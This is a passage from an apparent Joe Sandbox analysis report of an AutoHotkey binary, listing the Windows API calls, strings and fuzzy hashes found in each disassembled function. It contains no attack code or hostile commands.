                                      APIs
                                      • _free.LIBCMT ref: 00468001
                                      • SendMessageW.USER32(?,00000184,00000000,00000000), ref: 00468070
                                        • Part of subcall function 00473B90: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00473BAD
                                        • Part of subcall function 00473B90: GetWindowLongW.USER32(?,000000F0), ref: 00473BB9
                                        • Part of subcall function 00473B90: IsWindowVisible.USER32(?), ref: 00473BDA
                                        • Part of subcall function 00473B90: IsIconic.USER32(?), ref: 00473BED
                                        • Part of subcall function 00473B90: GetWindowRect.USER32(?,?), ref: 00473C51
                                        • Part of subcall function 00473B90: GetPropW.USER32(?,ahk_dlg), ref: 00473C60
                                        • Part of subcall function 00473B90: ShowWindow.USER32(00000000,00000000,?,ahk_dlg,?,?), ref: 00473C74
                                        • Part of subcall function 00473B90: GetUpdateRect.USER32(?,?,00000000), ref: 00473C9C
                                        • Part of subcall function 00473B90: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00473CAA
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004684F1
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00468504
                                      • SendMessageW.USER32(00000000,00001330,-00000001,00000000), ref: 0046851D
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046852C
                                        • Part of subcall function 00473F30: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00473F47
                                      • SendMessageW.USER32(?,0000130C,-00000001,00000000), ref: 00468557
                                      Similarity
                                      • API ID: MessageSend$Window$LongRect$IconicPropShowUpdateVisible_free
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SafeArrayGetDim.OLEAUT32(?), ref: 0046237D
                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0046239B
                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004623B5
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004623CD
                                      • SafeArrayGetElemsize.OLEAUT32(?), ref: 004623F1
                                      Similarity
                                      • API ID: ArraySafe$Bound$AccessDataElemsize
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004740A0
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004740A9
                                      • SendMessageW.USER32(?,0000130A,00000000,?), ref: 004740CC
                                      • SendMessageW.USER32(?,0000132C,00000000,00000000), ref: 004740D8
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00474129
                                      • MapWindowPoints.USER32(?,?,?,00000002), ref: 00474144
                                      Similarity
                                      • API ID: MessageSend$Window$ClientLongPointsRect
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _memset.LIBCMT ref: 0043D612
                                      • __fassign.LIBCMT ref: 0043D64B
                                        • Part of subcall function 0049BF9D: wcstoxl.LIBCMT ref: 0049BFAD
                                        • Part of subcall function 0049A0CD: __fassign.LIBCMT ref: 0049A0C3
                                      • __fassign.LIBCMT ref: 0043D67B
                                      • _wcsncpy.LIBCMT ref: 0043D6A7
                                      • _wcsncpy.LIBCMT ref: 0043D6CB
                                      • Shell_NotifyIconW.SHELL32(00000001), ref: 0043D6E3
                                      Similarity
                                      • API ID: __fassign$_wcsncpy$IconNotifyShell__memsetwcstoxl
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsdup_free
                                      • String ID: ERCP$O$RegExMatch
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: ?$Invalid option.$Too few parameters passed to function.${All}
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 004708BD
                                      • __itow.LIBCMT ref: 004708E5
                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0047093F
                                      • ShowWindow.USER32(?,00000000), ref: 0047099F
                                        • Part of subcall function 00470A70: __wcsicoll.LIBCMT ref: 00470A8C
                                      Strings
                                      Similarity
                                      • API ID: Window$LongMessageSendShow__itow__wcsicoll
                                      • String ID: Submit
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004102DB
                                        • Part of subcall function 0047FFB0: _vswprintf_s.LIBCMT ref: 0047FFC9
                                      • GetTickCount.KERNEL32 ref: 004102F1
                                      • GetTickCount.KERNEL32 ref: 004103F4
                                      • PostMessageW.USER32(0002044A,00000312,?,00000000), ref: 00410417
                                      Strings
                                      • %u hotkeys have been received in the last %ums.Do you want to continue?(see #MaxHotkeysPerInterval in the help file), xrefs: 0041037C
                                      Similarity
                                      • API ID: CountTick$MessagePost_vswprintf_s
                                      • String ID: %u hotkeys have been received in the last %ums.Do you want to continue?(see #MaxHotkeysPerInterval in the help file)
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • _wcsncpy.LIBCMT ref: 00441654
                                      • __wcstoi64.LIBCMT ref: 00441694
                                      • __fassign.LIBCMT ref: 004416E2
                                      • __fassign.LIBCMT ref: 0044170E
                                        • Part of subcall function 0049C2F2: __wtof_l.LIBCMT ref: 0049C2FC
                                        • Part of subcall function 0049A0CD: __fassign.LIBCMT ref: 0049A0C3
                                      Strings
                                      Similarity
                                      • API ID: __fassign$Window$ForegroundVisible__wcstoi64__wtof_l_wcsncpy
                                      • String ID: msctls_statusbar321
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wsplitpath_wcschr
                                      • String ID: *
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __swprintf
                                      • String ID: %i-%i$%s%s%s%s%s%s$(no)$OFF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,KbdLayerDescriptor), ref: 00419082
                                      • GetCurrentProcess.KERNEL32(?), ref: 0041909E
                                      • IsWow64Process.KERNEL32(00000000), ref: 004190A5
                                      • FreeLibrary.KERNEL32(00000000), ref: 004190CB
                                      Strings
                                      Similarity
                                      • API ID: Process$AddressCurrentFreeLibraryProcWow64
                                      • String ID: KbdLayerDescriptor
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00008000,?,?,?,?,00434CA8,004B0CF8), ref: 0047C267
                                      • GetPrivateProfileStringW.KERNEL32(?,004B0CF8,ERROR,?,0000FFFF,?), ref: 0047C292
                                      • GetPrivateProfileSectionW.KERNEL32(?,?,0000FFFF,?), ref: 0047C2D6
                                      • GetPrivateProfileSectionNamesW.KERNEL32(?,0000FFFF,?), ref: 0047C2F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$Section$FullNameNamesPathString
                                      • String ID: ERROR
                                      • API String ID: 4060383694-2861137601
                                      • Opcode ID: 7e7f457d83c164da8499af263ac0f87e1ac7278a8e470280884b5c4588e41642
                                      • Instruction ID: 5b0d26fef9fb3741154be4cf79f6475b6628ba0c5ca6af79c6648833fca067f3
                                      • Opcode Fuzzy Hash: 7e7f457d83c164da8499af263ac0f87e1ac7278a8e470280884b5c4588e41642
                                      • Instruction Fuzzy Hash: FD216031504305ABD735DB44C885FFBB3B9EF85700F00896EA189861D0E7B89989D76A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDateFormatW.KERNEL32(00000400,00000000,00000000,ddd,?,?), ref: 0044E16B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: DateFormat
                                      • String ID: MMM$MMMM$ddd$dddd
                                      • API String ID: 2793631785-2187213731
                                      • Opcode ID: edf4230115f300e6d0fbc5cc9f98aae906d60e5887cbf0af1c98635d19d987ab
                                      • Instruction ID: aeb4f1a9d8d4490a7fd5bf74330efad32b079092415b50c63ed18fd255cbc3fd
                                      • Opcode Fuzzy Hash: edf4230115f300e6d0fbc5cc9f98aae906d60e5887cbf0af1c98635d19d987ab
                                      • Instruction Fuzzy Hash: 8201D1B1B88611A6F7245A0ADC46B779296FB85711F18C227F8519A3C1C37CEC4181AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(user32,IsHungAppWindow,?,0048420D), ref: 00485296
                                      • GetProcAddress.KERNEL32(00000000), ref: 0048529D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: IsHungAppWindow$user32
                                      • API String ID: 1646373207-934392274
                                      • Opcode ID: 1c47e967b3398c9dce536844779dfa577d466348b691985782fabfa249b1b805
                                      • Instruction ID: 3aba9b08236de5ed654823362906a440f37b5f449c11d7ce4275a92dd44ad3d8
                                      • Opcode Fuzzy Hash: 1c47e967b3398c9dce536844779dfa577d466348b691985782fabfa249b1b805
                                      • Instruction Fuzzy Hash: B8F0BB71696712AAEB115B746C06F5E3798AB01B01F25447FF403D55E0DF58C4409B5C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _malloc.LIBCMT ref: 0049A79C
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • std::exception::exception.LIBCMT ref: 0049A7D1
                                      • std::exception::exception.LIBCMT ref: 0049A7EB
                                      • __CxxThrowException@8.LIBCMT ref: 0049A7FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                      • String ID: 4tM
                                      • API String ID: 615853336-2669483393
                                      • Opcode ID: c8bcd54b1c9fee24d6521b7071256cdf1934a5af02535721511bcc26ef9e2dff
                                      • Instruction ID: e13e35127ef9e70d3dff5ae51d32e76a730e3306eef67bd08b9586800c482c61
                                      • Opcode Fuzzy Hash: c8bcd54b1c9fee24d6521b7071256cdf1934a5af02535721511bcc26ef9e2dff
                                      • Instruction Fuzzy Hash: AFF0D1309402096ADF11EB55DC46AAE3FB9AF5071CB6000BFF814962A1DBBC8A1586CE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000002,00000000,004050AA,?,00000000,?,?,0041A42E,004B0CF8,004642C5,?,00000001,?), ref: 004050F1
                                      • GlobalLock.KERNEL32(00000000,?,?,0041A42E,004B0CF8,004642C5,?,00000001,?), ref: 00405116
                                      • GlobalFree.KERNEL32(00000000), ref: 00405127
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Global$AllocFreeLock
                                      • String ID: GlobalAlloc$GlobalLock
                                      • API String ID: 1811133220-3672399903
                                      • Opcode ID: 70b91be451777ed86922f46ff293be6905bc89da4934d29dccb5e03b56f421c3
                                      • Instruction ID: 9bfc458d229dd1d84222a0b95eb0bef5cc21c228c8fe386269b48dc9ef824c2f
                                      • Opcode Fuzzy Hash: 70b91be451777ed86922f46ff293be6905bc89da4934d29dccb5e03b56f421c3
                                      • Instruction Fuzzy Hash: 66F08170A40B019BC720AB758905A1777E9EF94709300887BA857C7790EB78D8008F1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CloseHandle.KERNEL32(00000000,02C50FF8,?,?,00414911), ref: 0040E753
                                      • CreateMutexW.KERNEL32(00000000,00000000,AHK Keybd,02C50FF8,?,?,00414911), ref: 0040E75E
                                      • GetLastError.KERNEL32 ref: 0040E766
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E791
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CreateErrorLastMutex
                                      • String ID: AHK Keybd
                                      • API String ID: 2372642624-4057427925
                                      • Opcode ID: 2e0d950e03243fa631d9cacbcec111292c8a91bd9719d91d0f5be31a91f2a9dc
                                      • Instruction ID: f3af930216dba3c32d2826a1fc649874deb868cf857af4cee206d493a2815e0b
                                      • Opcode Fuzzy Hash: 2e0d950e03243fa631d9cacbcec111292c8a91bd9719d91d0f5be31a91f2a9dc
                                      • Instruction Fuzzy Hash: 56F0A7B3B1232057DB206B75ED88B4B6B589B84B61F050437E505D72D0D77C8C40426C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CloseHandle.KERNEL32(00000000,02C50FF8,?,?,0041491E), ref: 0040E7C3
                                      • CreateMutexW.KERNEL32(00000000,00000000,AHK Mouse,02C50FF8,?,?,0041491E), ref: 0040E7CE
                                      • GetLastError.KERNEL32 ref: 0040E7D6
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E801
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CreateErrorLastMutex
                                      • String ID: AHK Mouse
                                      • API String ID: 2372642624-1022267635
                                      • Opcode ID: 7a34951013c0a61e00e3a3fa4bc317dada32b2efcea6c5033a87a54a16989156
                                      • Instruction ID: 39463d49a4088dd806c9e760a42763cd72a9b9d8de9409561af5fa091353bca1
                                      • Opcode Fuzzy Hash: 7a34951013c0a61e00e3a3fa4bc317dada32b2efcea6c5033a87a54a16989156
                                      • Instruction Fuzzy Hash: 6BF0A7B3B1132057DB206BB9ECC8B8A6B589B84B61F150837E505D72D4D77C8C80426C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryW.KERNEL32(uxtheme,-004D98C1,?,0043D0C0,?), ref: 004823AC
                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 004823BE
                                      • FreeLibrary.KERNEL32(00000000), ref: 004823DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: SetWindowTheme$uxtheme
                                      • API String ID: 145871493-1369271589
                                      • Opcode ID: 9fdb9af0fecbaaf04de43fdf768352dccd8a002899cb3eb92d7604187643ccf4
                                      • Instruction ID: a9f685e356b3f31b4e9343c8a98a14d741d5dd4eddda3ddee52148d147569da1
                                      • Opcode Fuzzy Hash: 9fdb9af0fecbaaf04de43fdf768352dccd8a002899cb3eb92d7604187643ccf4
                                      • Instruction Fuzzy Hash: 22E08679B816112B82902B35AD09F9F3E559FC6B12715453AFC06D7240CBBCCC0682BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID:
                                      • API String ID: 3832890014-0
                                      • Opcode ID: 4d8b73bdd61d8e2d0483357e57812dc946ec1654c0a04bc8a223a66773e346fd
                                      • Instruction ID: 68b2e2123b779f65d6a0961ec8a4b3e458778bcc01030d9c131b5de5733aeef2
                                      • Opcode Fuzzy Hash: 4d8b73bdd61d8e2d0483357e57812dc946ec1654c0a04bc8a223a66773e346fd
                                      • Instruction Fuzzy Hash: 77812A66A01223B6E71057119C12BB273919F09358F1AD077DD46EB3C2E66DFC42C7AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 00416210
                                      • UnhookWindowsHookEx.USER32(00000000), ref: 0041624D
                                      • GetTickCount.KERNEL32 ref: 0041629C
                                      • GetTickCount.KERNEL32 ref: 004163DF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountHookTick$CallNextUnhookWindows
                                      • String ID:
                                      • API String ID: 2092930497-0
                                      • Opcode ID: b715e4d5fb4f8b78326e425589830abd0cf655e6d3a565b63121fb919309f234
                                      • Instruction ID: ccba0d24c59a3afc4a6b793f44427c6f14b52417a2a1b4b3a2272b88b855a2cd
                                      • Opcode Fuzzy Hash: b715e4d5fb4f8b78326e425589830abd0cf655e6d3a565b63121fb919309f234
                                      • Instruction Fuzzy Hash: 8E61EF705062118AD724DF29E8907B6B7E1FB54710F05887FE896C3351EB78E894CBAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,0040F31B,004D8348,004B0CF8,00000000,00000000), ref: 004846E1
                                      • IsWindowVisible.USER32(00000000), ref: 004846F6
                                        • Part of subcall function 00485450: __wcsnicmp.LIBCMT ref: 00485514
                                        • Part of subcall function 00485450: __wcstoui64.LIBCMT ref: 00485593
                                      • IsWindow.USER32(004B0CF8), ref: 004847EC
                                        • Part of subcall function 00485360: IsWindowVisible.USER32(004B0CF8), ref: 00485361
                                      • GetWindowLongW.USER32(004B0CF8,000000F0), ref: 00484818
                                      • EnumWindows.USER32(00484920,00000002), ref: 0048486A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$Visible$EnumForegroundLongWindows__wcsnicmp__wcstoui64
                                      • String ID:
                                      • API String ID: 256079111-0
                                      • Opcode ID: eb470d08f536ee960caf0479229bc1bea4746805785ae4bc82e26e7c7608c190
                                      • Instruction ID: fab4234c97850387ccbfdd78dfa84d182b2f6d3e31ef76e0a1dc178efcc0eaa5
                                      • Opcode Fuzzy Hash: eb470d08f536ee960caf0479229bc1bea4746805785ae4bc82e26e7c7608c190
                                      • Instruction Fuzzy Hash: 9F5183759043D28ADB30BF6598801EFB7E4BBC6344F448D2FE98983340EB784944CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ImageList_GetIconSize.COMCTL32(?,?,?), ref: 0045A1BF
                                      • ImageList_AddMasked.COMCTL32(?,00000000), ref: 0045A222
                                      • DeleteObject.GDI32(00000000), ref: 0045A230
                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 0045A245
                                      • DestroyIcon.USER32(00000000), ref: 0045A253
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: IconImageList_$DeleteDestroyMaskedObjectReplaceSize
                                      • String ID:
                                      • API String ID: 1613341713-0
                                      • Opcode ID: fe1463ebc55d8ea28cd94c0f35790740bf8442e2befc5a37b58b8544447efd2b
                                      • Instruction ID: a5064abfee353a980abf435dd2dd6ce479ca477cdae80e2bf57e2614798589ec
                                      • Opcode Fuzzy Hash: fe1463ebc55d8ea28cd94c0f35790740bf8442e2befc5a37b58b8544447efd2b
                                      • Instruction Fuzzy Hash: 8041C1B19042129FC314DF69DC84A6BB7E9FB89315F148B2EF859C3241D734E819CBA6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageW.USER32(00000000,00001304,00000000,00000000), ref: 004741BA
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004741F2
                                      • SendMessageW.USER32(?,0000130C,-00000001,00000000), ref: 00474236
                                      • GetDlgCtrlID.USER32 ref: 00474252
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$Ctrl
                                      • String ID:
                                      • API String ID: 4210937766-0
                                      • Opcode ID: ffdff617bcee6b181f7d7581485404b42f8bd52d268a8072be311176732e6f0d
                                      • Instruction ID: da1c7568fc3642a3a5f9211162673405ccf37517d94f2375e71d74ea23fe143b
                                      • Opcode Fuzzy Hash: ffdff617bcee6b181f7d7581485404b42f8bd52d268a8072be311176732e6f0d
                                      • Instruction Fuzzy Hash: 99312630204215AAD320DA699C44FF7BBD8EBD5345F04CAABF949C62D3C768DC94CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageW.USER32(?,00000030,?,00000000), ref: 0046874D
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0046879D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
